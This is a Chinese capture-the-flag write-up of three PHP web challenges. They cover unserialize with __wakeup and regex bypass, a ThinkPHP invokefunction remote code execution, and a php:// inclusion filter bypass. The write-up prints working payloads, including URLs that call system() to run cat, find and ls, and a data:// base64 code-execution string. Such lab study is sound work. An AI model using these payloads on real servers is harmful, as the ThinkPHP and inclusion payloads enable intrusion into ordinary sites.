攻防世界 Web 挑战题解：反序列化、RCE 与文件包含实战

二：Web_php_unserialize

这是一个典型的反序列化题目。

进行代码审计

首先定义了一个 Demo 类，私有属性初始值为 index.php。声明了两个函数，$file 用于接收外部传入的文件路径。__construct 对变量赋初始值，__destruct 在程序结束时高亮输出文件内容。

提示 flag 在 fl4g.php 中，所以只要将 index.php 修改为 fl4g.php 即可获取 flag。

第二段代码接受一个 var 参数，base64 解密后利用正则表达式过滤，不符合则反序列化，符合则输出 stop。

限制条件有两个：__wakeup 方法和正则表达式 preg_match('/[oc]:\d+:/i')。

__wakeup 容易绕过，方法是让属性值数量大于实际属性个数。正则如何绕过呢？

正常序列化结果如下：

O:4:"Demo":1:{s:10:" Demo file";s:8:"fl4g.php";}

Wakeup 绕过：O:4:"Demo":2:{s:10:" Demo file";s:8:"fl4g.php";}

正则绕过：O:+4:"Demo":2:{s:10:" Demo file";s:8:"fl4g.php";}

Payload：TzorNDoiRGVtbyI6Mjp7czoxMDoiIERlbW8gZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

输入后未出现 flag，问题在于 Demo 前后有两个空格。加上这两个空格看看：

还是什么都没有。只能用 str_replace 替换方案。

最终 Payload：

payload:?var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

成功拿到 flag。

解密代码

<?php 
class Demo { 
    private $file = 'index.php'; 
    public function __construct($file) { 
        $this->file = $file; 
    } 
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    } 
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php 
            $this->file = 'index.php'; 
        } 
    } 
} 
$flag=new Demo ('fl4g.php'); 
$flag =(serialize($flag)); 
$flag =str_replace('O:4','O:+4',$flag); 
$flag =str_replace(':1:',':2:',$flag); 
echo base64_encode($flag); 
?> 

三：php_rce

打开页面如下图所示，通过搜索引擎发现该框架存在控制器名过滤不严的漏洞，可通过 URL 调用框架内部敏感函数导致 RCE。

通过 payload 找到 flag 所在位置：

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find%20/%20-name%20"flag"

最终 payload：

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag

成功拿到 flag。

四：web_php_include

这是一道文件包含题目。

代码审计

接收一个 page 参数，利用 while 循环和 strstr 函数检查 page 中是否包含 php://。如果包含则将其替换为空，然后退出循环。

想拿到 flag 就需要绕过 strstr 函数，它过滤的是 php://，那么利用大小写混淆就能绕过。

构建 payload：?page=Php://input。然后利用爆破执行命令，成功找到 flag 文件。

成功拿到 flag。

五：总结

1. WEB 2

题型特征 基础类题目，通常考察查看源代码、HTTP 头信息或简单请求操作。可能隐藏 Flag 在 HTML 注释、响应头或通过简单请求触发返回。

解题思路

1. 查看页面源代码：按 F12 或右键查看源码，搜索 flag 或 hint，常见于注释中。
2. 检查 HTTP 响应头：使用浏览器开发者工具的'网络'标签查看响应头，可能直接包含 Flag。
3. 发送特定请求：修改请求方法（GET/POST），如提交参数 ?what=flag；使用 Python 脚本快速发送 POST 请求。

2. Web_php_unserialize

题型特征 涉及 PHP 反序列化漏洞，通过构造恶意序列化数据触发魔术方法（如 __destruct）执行命令。需绕过 __wakeup 方法限制及正则过滤。

解题思路

1. 绕过 __wakeup：修改序列化字符串中对象属性数量，使其大于实际数量（如将 O:4:"Demo":1:改为 O:+4:"Demo":2:）。
2. 正则过滤绕过：替换 O:4 为 O:+4，利用正则表达式 /[oc]:\d+:/i 不匹配 + 的特性。
3. 构造 Payload：示例序列化字符串需进行 Base64 编码后传参，工具辅助生成避免手动构造错误。

3. php_rce

题型特征 利用框架的远程代码执行漏洞，通过特定路由或参数注入命令。

解题思路

1. Payload 构造：尝试不同版本 Payload。
2. 读取文件：?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag
3. 查找 Flag 文件：?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name "flag"
4. 执行系统命令：?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls

4. web_php_include

题型特征 文件包含漏洞，利用 PHP 伪协议（如 data://、php://input）执行代码。常见过滤场景：替换 php://关键字，需绕过协议限制。

解题思路

1. 伪协议利用：大小写混淆（如 pHp://）或使用 data://。
2. 文件读取：使用 php://filter 读取源码：?page=php://filter/convert.base64-encode/resource=index.php
3. Base64 编码绕过：?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCJscyIpOw==
4. 执行代码：?page=data://text/plain,